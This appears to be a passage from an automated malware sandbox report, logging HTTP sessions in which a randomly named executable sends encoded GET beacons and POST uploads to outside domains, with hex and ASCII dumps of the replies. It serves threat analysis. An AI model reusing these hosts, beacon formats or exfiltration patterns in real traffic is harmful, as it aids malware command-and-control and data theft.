                                                                                                                            Data Ascii: vymxwuuRl5IaPsh9N0komLKsazc9tk+3fW5dO92a9lsZ/ZTzEtntdfdKQdGZ3iVpTNLNnkpp/stGJyxfDCdLsWXXjN62PACW0vvcTG2Q2wXhKLVDrqiWHsU06hZ1XTy2guijPaK5ZDhlnJaol9PCf17AB8PyTvHlXfU3DIsQ8MLcYnSs5bEneDXQZ7TXUPzmAGvoHEJE46n8nAbf/JGaPop4tOeNl+wRjVSFCRGr0JKlWvY3jGV
                                                                                                                            Nov 7, 2024 10:50:56.010493994 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:55 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED]
                                                                                                                            Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$|thTB%;@i)b/:gj2{A$0*@HuAlOHzkt*jBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^|gS^wmIeG4(pSBRa"|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#|N>C%w}z|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~*pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 |\JzPAY'/4;@L>M&Mn~e(ab8$&n*"tR\,}oCQMRA [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:56.010521889 CET1236INData Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f
                                                                                                                            Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
                                                                                                                            Nov 7, 2024 10:50:56.010534048 CET1070INData Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8
                                                                                                                            Data Ascii: /l*)/,/z~}z]@BN-*mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            13192.168.2.2249174194.58.112.17480652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:50:57.667145967 CET534OUTGET /xprp/?mFptYb=VtQLa3osnF7akoTJd4GrPXLEITF5D20FSH4Ha68GLubc/osER9eykAEgUNChz5U0fhCRjr86/53OttkDG1sp/tuoYRmADukdDHAerdJ8reArgzR0s5PIA9lSC6/k&Vta=nFypuDtholF HTTP/1.1
                                                                                                                            Host: www.marketplacer.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:50:58.540420055 CET1236INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Thu, 07 Nov 2024 09:50:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED]
                                                                                                                            Data Ascii: 24fc<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.marketplacer.top</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg. [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:50:58.540811062 CET212INData Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f
                                                                                                                            Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.marketplacer.
                                                                                                                            Nov 7, 2024 10:50:58.540837049 CET1236INData Raw: 74 6f 70 3c 2f 68 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1
                                                                                                                            Data Ascii: top</h1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-bu
                                                                                                                            Nov 7, 2024 10:50:58.540878057 CET1236INData Raw: 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e
                                                                                                                            Data Ascii: mage b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nb
                                                                                                                            Nov 7, 2024 10:50:58.540889025 CET1236INData Raw: 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 26 75 74 6d 5f 6d 65 64 69 75 6d 3d
                                                                                                                            Data Ascii: ing" href="https://www.reg.ru/hosting/?utm_source=www.marketplacer.top&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount
                                                                                                                            Nov 7, 2024 10:50:58.540900946 CET1236INData Raw: 63 6f 6d 70 61 63 74 22 3e d0 9a d0 be d0 bd d1 81 d1 82 d1 80 d1 83 d0 ba d1 82 d0 be d1 80 20 d1 81 d0 b0 d0 b9 d1 82 d0 be d0 b2 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70
                                                                                                                            Data Ascii: compact"> </strong><p class="b-text b-parking__promo-description"> &nbsp; &nbsp; </p><a class="b-button b
                                                                                                                            Nov 7, 2024 10:50:58.541099072 CET1236INData Raw: 74 74 6f 6d 2d 6e 6f 6e 65 40 64 65 73 6b 74 6f 70 22 3e d0 a3 d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 b8 d1 82 d0 b5 20 d0 b1 d0 b5 d1 81 d0 bf d0 bb d0 b0 d1 82 d0 bd d1 8b d0 b9 20 53 53 4c 2d d1 81 d0 b5 d1 80 d1 82 d0 b8 d1 84 d0 b8 d0 ba d0
                                                                                                                            Data Ascii: ttom-none@desktop"> SSL- &nbsp; &nbsp;! , &nbsp;
                                                                                                                            Nov 7, 2024 10:50:58.541110992 CET1236INData Raw: 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 68 65 61 64 20 20 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b
                                                                                                                            Data Ascii: eElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.marketplacer.top&rand=' + Math.random() + '&callback=ondata'; script
                                                                                                                            Nov 7, 2024 10:50:58.541122913 CET767INData Raw: 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 65 2c 74 2c 72 2c 69 2c 6b 2c 61 29 7b 6d 5b 69 5d 3d 6d 5b 69 5d
                                                                                                                            Data Ascii: trika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date(); for (var j = 0; j < document.scripts.length; j++) {if (document.scripts[j].src ===


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            14192.168.2.224917515.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:03.955749035 CET2472OUTPOST /k47i/ HTTP/1.1
                                                                                                                            Host: www.energyparks.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.energyparks.net
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 2163
                                                                                                                            Referer: http://www.energyparks.net/k47i/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 31 70 6a 6c 4c 77 73 65 66 2b 72 50 71 31 71 65 63 53 42 44 65 39 47 47 75 33 45 75 5a 31 4a 2b 76 4d 45 44 2b 38 4f 7a 32 67 37 50 6e 44 31 30 50 45 30 6e 7a 71 45 51 52 54 47 6b 78 4c 74 4a 7a 65 61 56 67 39 31 79 63 4d 70 6a 70 67 64 45 76 77 52 4b 39 44 46 64 2b 35 51 55 71 65 4d 32 76 67 31 35 4f 47 37 53 79 31 64 5a 76 51 6f 6c 41 56 64 41 51 76 67 39 73 42 4b 6c 76 6a 78 4f 30 62 63 35 6d 34 6a 44 57 57 44 45 2f 77 69 69 62 58 4b 64 4b 59 56 68 5a 76 70 55 4a 41 59 31 48 6a 49 4d 5a 7a 47 63 38 45 5a 36 4a 35 77 39 6a 79 74 72 63 2f 77 59 72 71 50 78 74 59 37 69 4b 33 6e 4f 70 61 72 32 74 30 79 2b 76 4c 74 77 77 51 71 2f 6c 46 52 43 4f 50 73 61 49 46 6f 38 6c 44 36 2b 64 65 2f 76 64 31 67 44 62 78 2b 35 77 41 45 53 62 31 54 71 55 6d 46 51 6e 2f 4b 70 46 6f 46 64 70 4f 39 32 4e 30 73 32 77 31 46 51 55 5a 70 31 6e 48 76 73 4f 31 58 34 37 76 52 55 53 63 78 55 66 33 71 53 51 32 51 59 4a 45 6c 70 64 58 69 44 77 47 57 62 34 33 51 76 6c 49 6f [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=wmZkboj32hLN1pjlLwsef+rPq1qecSBDe9GGu3EuZ1J+vMED+8Oz2g7PnD10PE0nzqEQRTGkxLtJzeaVg91ycMpjpgdEvwRK9DFd+5QUqeM2vg15OG7Sy1dZvQolAVdAQvg9sBKlvjxO0bc5m4jDWWDE/wiibXKdKYVhZvpUJAY1HjIMZzGc8EZ6J5w9jytrc/wYrqPxtY7iK3nOpar2t0y+vLtwwQq/lFRCOPsaIFo8lD6+de/vd1gDbx+5wAESb1TqUmFQn/KpFoFdpO92N0s2w1FQUZp1nHvsO1X47vRUScxUf3qSQ2QYJElpdXiDwGWb43QvlIobQbaKwx/Cwb1Wp8EireBWEvsQcsTkRlVEM7wpfJ2HRY3MOVCG3NhnQsWkN7LtOWji77xQc6aLP08fvpOJmoi6zgcZTLun1ceeKZz7HGG1vAs4aGETdmWEfa0SWH/eiWsylTaZw7mPm2YEaL9uc/ktVlNXoPAI4pZS1+29tWYtjEm1Q6krDE8eXbo353Yjdy8ENrf4qR2QSL7Evu22j8ZkCS20RBjLWu6RmLsBntDIrQyoGFNN9GwIcHpVrX9ge5U7P5Iq59Mr8dkBqANI/Vq+nvkAWqOzQPYQtdZLuTMpHP50liYzaEZIpJac3waVj2Jpomx831Dtuowon8d1Qz7IhpIWaq+WkiHpwfOtca+dBLn6kUTrSKdA9t34EeWlSaNKQI5OkpESpMhrmPEZQ/l/H8I18F8SiXYP375AprqotcX5ntYD9K1YU3fADgRTtnYtVUulPBxTe4HKdJ7vTQxOotZmr98Pvzkx2j4uFL3Koo+0AsjPjph2BFlCOvARt4jqWZiPesk/iLOYN0SWlUmZxV5kQorBkcM4Jqi/WyaC9DTLM9afSbWSUIl3ECszft6LxVuElANT/YWu0MKdtCYqovBSGtsDnwc3+MNVJj01o7T4Al5OiPjthX0fVuZEKEtp930o3k+t7E0mttsGhcCb6C4bnidR8py/Z [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:03.960720062 CET288OUTData Raw: 4f 6b 6b 59 2b 4e 6b 77 4a 72 75 51 73 49 2b 71 6a 46 61 31 36 4f 36 56 56 35 67 65 6c 74 56 79 6c 43 66 45 55 52 6a 33 6f 33 66 5a 77 47 76 79 71 62 41 4d 68 2f 37 66 32 4b 6a 2f 69 55 6e 65 56 50 65 6b 66 4f 4d 74 76 32 50 42 72 76 57 78 69 38
                                                                                                                            Data Ascii: OkkY+NkwJruQsI+qjFa16O6VV5geltVylCfEURj3o3fZwGvyqbAMh/7f2Kj/iUneVPekfOMtv2PBrvWxi8o8Mf/dwS4UcnnrGHIzIT/XbuT4rY6JOXebWE1lBPLTYVhkJy1/dXklXgwTM1ojeyDzViop0OrxlRNvEBgBKujk/zqCRj67d4Rj2IiXfm4DnmyIXCRKiKFGatYZDFGWr04CqsPfIkrtfuKYjacX+TVCJmpOcz9v3ID


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.224917615.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:06.498207092 CET799OUTPOST /k47i/ HTTP/1.1
                                                                                                                            Host: www.energyparks.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.energyparks.net
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 203
                                                                                                                            Referer: http://www.energyparks.net/k47i/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 31 6f 6a 6c 5a 52 73 65 66 65 72 50 6e 56 71 65 58 79 42 46 65 39 61 6b 75 79 6b 2b 61 47 35 2b 73 5a 34 44 39 50 6d 7a 6a 67 37 49 2f 7a 31 77 42 6b 30 49 7a 71 46 37 52 58 47 6b 78 4c 70 4a 68 74 69 56 6d 34 5a 39 56 63 70 68 77 51 64 46 76 77 74 50 39 44 5a 4e 2b 39 73 55 71 59 6b 32 75 68 46 35 62 54 76 53 35 56 64 66 70 51 70 7a 41 56 52 76 51 76 78 2b 73 42 65 6c 76 53 64 4f 78 5a 55 35 74 2f 2f 44 64 32 44 46 34 77 6a 4c 4b 58 4c 77 46 4a 4d 68 56 5a 6b 79 4f 77 73 43 61 7a 6f 54 5a 53 33 56 31 56 70 6a 47 4f 67 70 33 67 67 64 46 51 3d 3d
                                                                                                                            Data Ascii: mFptYb=wmZkboj32hLN1ojlZRseferPnVqeXyBFe9akuyk+aG5+sZ4D9Pmzjg7I/z1wBk0IzqF7RXGkxLpJhtiVm4Z9VcphwQdFvwtP9DZN+9sUqYk2uhF5bTvS5VdfpQpzAVRvQvx+sBelvSdOxZU5t//Dd2DF4wjLKXLwFJMhVZkyOwsCazoTZS3V1VpjGOgp3ggdFQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.224917715.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:09.040909052 CET2472OUTPOST /k47i/ HTTP/1.1
                                                                                                                            Host: www.energyparks.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.energyparks.net
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 3627
                                                                                                                            Referer: http://www.energyparks.net/k47i/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Data Raw: 6d 46 70 74 59 62 3d 77 6d 5a 6b 62 6f 6a 33 32 68 4c 4e 32 4a 54 6c 65 43 30 65 65 2b 72 4d 69 56 71 65 63 53 42 42 65 39 47 6b 75 33 45 75 5a 30 56 2b 76 4f 38 44 39 73 4f 7a 77 51 37 49 75 6a 31 30 50 45 30 67 7a 71 35 64 52 54 4b 53 78 49 46 4a 7a 61 47 56 67 2b 4e 79 62 4d 70 6a 30 51 64 43 76 77 74 67 39 44 49 45 2b 39 6f 79 71 62 55 32 70 53 39 35 50 7a 76 52 38 56 64 66 70 51 6f 79 41 56 52 58 51 76 70 6d 73 45 37 36 76 6c 6c 4f 6f 37 63 35 71 59 6a 41 4a 47 44 42 37 77 69 73 62 58 48 37 4b 59 56 74 5a 75 49 78 4a 41 55 31 56 41 51 4d 5a 30 79 64 68 45 5a 35 4e 35 77 39 39 43 74 70 63 2f 77 45 72 71 50 78 74 59 76 69 4c 6e 6e 4f 70 62 72 70 70 30 79 2b 6c 72 74 48 74 41 6d 72 6c 45 31 73 4f 50 64 68 49 53 77 38 6b 41 53 2b 51 4f 2f 76 4a 56 67 42 62 78 2b 30 6e 51 45 30 62 31 62 55 55 6d 56 2b 6e 2f 4b 70 46 75 52 64 2f 4c 70 32 45 45 73 32 34 56 46 54 61 4a 70 79 6e 48 72 53 4f 77 44 34 37 72 39 55 53 73 42 55 4f 6c 43 52 61 6d 51 4d 62 30 6c 72 5a 58 69 57 77 47 4b 31 34 33 49 4a 6c 4e 34 [TRUNCATED]
                                                                                                                            Data Ascii: mFptYb=wmZkboj32hLN2JTleC0ee+rMiVqecSBBe9Gku3EuZ0V+vO8D9sOzwQ7Iuj10PE0gzq5dRTKSxIFJzaGVg+NybMpj0QdCvwtg9DIE+9oyqbU2pS95PzvR8VdfpQoyAVRXQvpmsE76vllOo7c5qYjAJGDB7wisbXH7KYVtZuIxJAU1VAQMZ0ydhEZ5N5w99Ctpc/wErqPxtYviLnnOpbrpp0y+lrtHtAmrlE1sOPdhISw8kAS+QO/vJVgBbx+0nQE0b1bUUmV+n/KpFuRd/Lp2EEs24VFTaJpynHrSOwD47r9USsBUOlCRamQMb0lrZXiWwGK143IJlN4bQYyKzQ/Cwr1VxMEuvedaEvlxcqPORnRENpYpcPCGeI3GcFCczNhNQsbFN/ftOn7i46RQYJCIJE8crpOkvIj7zg5KTK+30oOeLpz7GkfH1ws9A2FIIWWsfa1lWHepijIylTKZwNaPm2Z2L79sJPYPVlIcoMkY4opS1Om9tUwt4Um1EKkoIk8uXb8B51YzcBAEKKv4oTOQaL7Gtu2zgMYICSm0RBHiWuSRmuQBkMDImwysMlMT9GxxcHkBrXtae/M7P88qxcMrkNkAoANMpVqznvsQWrCVQOgQv85LpmgpGv56pCYzUkZQpJCm3yvgjzxpoXh8jlDsnIwr88d2Uz6VhpYWaqyWki/pxoytZr+dern07kTLZrhs9tmBEfS1Sc1Kf6RO08QVlchl2fETGPkaH8Ip8Ek4likP3KZA6aqnwsX+uNYUzq0pUzzuDhkIt0MtVU+lOyZTfIHKdJ7oTQxSotVYr54lvzkx2xcuFYfKgI+tLMjQnpgtBGJoOpp2t5PqWMuPesk8sbOfBUSXlUr7xV4oQovBkPg4bIa/WU2C7jTLatacb7WXUIkvEDgZfs6LwmWEkGZMiYWv8sKHiiUDovNaGo0DmHk3x+1VJT013rT7IF5X9/+2hWY5VvJuK19p+gYonWWu3U1BnNsYhcOo6CwDnj1r8pa/Z [TRUNCATED]
                                                                                                                            Nov 7, 2024 10:51:09.046020031 CET1752OUTData Raw: 4f 6b 45 59 39 75 4d 77 4f 4c 75 52 7a 59 2f 30 6a 46 61 56 36 4f 79 33 56 38 78 54 6c 76 39 79 71 45 72 45 51 6d 58 33 6b 6e 66 66 77 47 76 34 6b 37 4d 6c 68 2f 36 6d 32 4b 2f 2f 69 51 4c 65 56 4a 32 6b 63 2b 4d 73 77 57 50 45 6c 50 57 32 73 63
                                                                                                                            Data Ascii: OkEY9uMwOLuRzY/0jFaV6Oy3V8xTlv9yqErEQmX3knffwGv4k7Mlh/6m2K//iQLeVJ2kc+MswWPElPW2scoJMf+swWpDcg/rGVwzInrXb+Ty9o6aKXbeWE55BMflYkBkPQd/XEAlQAwHBVokeyPPVi4L0MTblk9vFxgBANbn7zqMZD62d4Rb2I6TfmVOnnqIXA5KwKFFOtYbCFHDr01mqt2+IlHtfvmYi6MX9TVCGGpPVT8u4oP


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.224917815.197.148.3380652C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 7, 2024 10:51:11.647349119 CET533OUTGET /k47i/?Vta=nFypuDtholF&mFptYb=9kxEYcPO0Qe31MjAFjIcWOncsH25cFhJfOSVnSYcFCRu8P8I16bnvFurvQhgIE0Ki89nSiSy+a0RlMSh3+VYEZE5/A1AoTNj5T9S7+51vpkFoip5Twnd4WVIrXl3 HTTP/1.1
                                                                                                                            Host: www.energyparks.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                                            Nov 7, 2024 10:51:12.235718966 CET402INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Thu, 07 Nov 2024 09:51:12 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 262
                                                                                                                            Connection: close
